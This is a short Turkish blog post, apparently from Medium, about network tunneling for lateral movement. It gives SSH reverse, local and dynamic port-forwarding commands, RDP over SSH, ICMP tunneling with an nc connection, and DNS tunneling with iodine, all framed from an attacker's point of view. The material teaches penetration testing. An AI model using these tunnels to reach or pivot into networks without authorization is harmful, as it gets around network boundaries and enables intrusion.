Enine Boyuna Tünelleme

Nedir bu tünelleme?

Tünellemeyi anlamak

SSH bağlantısı
HTTP bağlantısı
SSH içerisinden geçen HTTP bağlantısı

SSH Tünelleme

ssh -R 8080:localhost:80 kali:192.168.1.101
  • İç ağa erişim sağlayan saldırgan uzak sunucudan iç ağdaki sunucuya ssh bağlantısı yapmak isteyebilir. Ancak iç network private ip ye sahip olduğu için bunu direkt yapamayacaktır. Ancak içerden dışarıya yapacağı ssh bağlantısında port yönlendirme kullanarak oluşturduğu tünel içerisinden bağlantı sağlayabilir. Bu duruma reverse ssh diyebiliriz.
ssh -R 2222:localhost:22 kali@uzaksunucuip
Uzak Port Yönlendirme ile SSH Bağlantı Örneği
  • İç ağa erişim sağlayan saldırgan RDP bağlantısı yapmak isteyebilir. Bu durumda uzak sunucuya ssh bağlantısı sağlayabiliyorsa yukarıdaki ssh örneğindeki gibi iç ağdaki bilgisayarın 3389 portuna yönlendirme yaparak bunu başarabilir. Bazı kaynaklarda SSH tünelleme ile yapılan bu RDP bağlantılarına RDP tünelleme de denir.
ssh -R 2222:localhost:3389 kali@uzaksunucuip
ssh -D 8080 kali@192.168.1.101
Dinamik Yönlendirme ile Proxy oluşturmak
ssh -L 8080:ubuntu.com:80 kali:192.168.1.101
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
icmptunnel aracı ile tünelleme ve ssh bağlantısı kurmak
ICMP tünel içerisinden nc bağlantısı
iodined -fP parolamiz 172.16.0.1 tunnel.mydomain.com
iodine -fP parolamiz uzaksunucuip tunnel.mydomain.com
DNS tünelleme içerisinden ssh bağlantısı oluşturmak

Ekstra

Cyber Security Researcher

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmet Can KARAAĞAÇLI

Ahmet Can KARAAĞAÇLI

Cyber Security Researcher

More from Medium

Bi-directional Optical Flow (BDOF) Prediction Refinement in VVC

Preventing samaccountname spoofing and kdc bamboozing

Best Proxy Scrapers for 2022

Virtual Tourist 12/03/21

Assassin’s Creed Odyssey — statues